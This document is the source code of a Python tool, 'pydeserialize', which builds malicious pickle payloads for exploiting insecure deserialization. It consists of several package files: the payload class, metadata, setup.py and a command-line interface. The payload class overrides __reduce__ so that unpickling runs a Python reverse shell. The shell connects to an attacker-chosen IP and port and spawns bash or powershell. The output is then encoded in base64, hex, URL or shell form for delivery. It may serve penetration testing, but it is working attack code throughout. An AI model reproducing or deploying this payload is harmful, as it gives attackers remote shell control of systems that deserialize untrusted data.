import pickle
import os
from .encoded import Encode

class Desserialize(object):

    def __init__(self,ip:str,porta:str,sistema:str):
        self.__ip = ip
        self.__porta = porta
        self.__sistema = sistema

    def __reduce__(self) -> tuple:
        match self.__sistema:
            case "Windows":
                return (os.system,(f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{self.__ip}\",{self.__porta}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"powershell\")'",))
            case "Linux":
                return (os.system,(f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{self.__ip}\",{self.__porta}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'",))    
                
class ObjetoMalicioso():

    def __init__(self,ip:str,porta:str,encode:str,sistema:str):
        self.__ip = ip
        self.__porta = porta
        self.__encode = encode
        self.__sistema = sistema

    def Objeto_Serializado(self):
        Object = pickle.dumps(Desserialize(self.__ip,self.__porta,self.__sistema))
        match self.__encode:
            case "b64":
                Encode.base64(Object)
            case "shell":
                Encode.shell(Object)
            case "urlencode":
                Encode.urlencode(Object)
            case "hex":
                Encode.hexadecimal(Object)



__version__ = '0.0.6'
__version_tuple__ = version_tuple = (0,0,6)
__title__ = "pydeserialize"
__description__ = "Insecure deserialization in python"
__url__ = "https://github.com/joaoviictorti/pyserialize"
__author__ = "joaoviictorti (viictorjj)"
__author_email__ = "joaovictorti08@gmail.com"
__copyright__ = "Copyright João Victor"


#!/usr/bin/python3
# -*- coding: UTF-8 -*-

from setuptools import setup, find_packages
import os,sys

meta = {}
here = os.path.abspath(os.path.dirname(__file__))

with open(f"{here}/pydeserialize/__meta__.py") as arquivo:
    exec(arquivo.read(), meta)

with open(f"{here}/requirements.txt", "r", encoding="utf-8") as f:
    requires = f.read().splitlines()
    if not requires:
        print("Não foi possível ler os requisitos do arquivo requirements.txt"
              "Isso indica que esta cópia do código-fonte está incompleta.")
        sys.exit(2)

with open("README.md", "r",encoding="utf-8") as arq:
    readme = arq.read()

setup(name=meta["__title__"],
    version=meta["__version__"],
    license='MIT License',
    author=meta["__author__"],
    url=meta["__url__"],
    long_description=readme,
    long_description_content_type="text/markdown",
    author_email=meta["__author_email__"],
    keywords='serialize insegura desserialize   ',
    description=meta["__description__"],
    packages=find_packages(),
    zip_safe=False,
    install_requires=requires,
    python_requires=">=3.6, <4",
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Environment :: Console",
        "Intended Audience :: System Administrators",
        "License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
        "Natural Language :: English",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Programming Language :: Python :: 3.11",
        "Programming Language :: Python :: 3 :: Only",
        "Programming Language :: Python :: Implementation :: PyPy",
        "Topic :: Security",
        "Topic :: System :: Networking",
        "Topic :: System :: Operating System",
        "Topic :: System :: Systems Administration",
        "Topic :: Utilities"
    ],
    entry_points={'console_scripts': [
        'pydeserialize=pydeserialize.pydeserialize:argumentos',
        ]
    })


import argparse
from .run import ObjetoMalicioso
from argparse import RawTextHelpFormatter

def banner():
    return """                                                                                                                                            
                 ,--.                            ,--.        ,--.,--.               
 ,---.,--. ,--.,-|  | ,---.  ,---.  ,---. ,--.--.`--' ,--,--.|  |`--',-----. ,---.  
| .-. |\  '  /' .-. || .-. :(  .-' | .-. :|  .--',--.' ,-.  ||  |,--.`-.  / | .-. : 
| '-' ' \   ' \ `-' |\   --..-'  `)\   --.|  |   |  |\ '-'  ||  ||  | /  `-.\   --. 
|  |-'.-'  /   `---'  `----'`----'  `----'`--'   `--' `--`--'`--'`--'`-----' `----' 
`--'  `---'                                                                                                                              
     v0.0.2 - @joaoviictorti                                                   
"""

def argumentos() -> None:
    
    parse = argparse.ArgumentParser(prog=banner(),usage="pyserialize -ip 192.168.4.113 -p 80 -o Windows",formatter_class=RawTextHelpFormatter)
    parse.add_argument("--version",action="version",version="pydeserialize 0.0.6")
    parse.add_argument("-ip",action="store",type=str,dest="ip",required=True, help="Insert ip")
    parse.add_argument("-p",action="store",type=str,dest="port",required=True, help="Insert port")
    parse.add_argument("-e",action="store",type=str,dest="encode",choices=["b64","shell","urlencode","hex"],default="",required=True,help="Insert encoding")
    parse.add_argument("-o",action="store",type=str,dest="SO",choices=["Windows","Linux"],required=True,help="Insert operational system")
    args = parse.parse_args()
    
    ObjetoMalicioso(args.ip,args.port,args.encode,args.SO).Objeto_Serializado()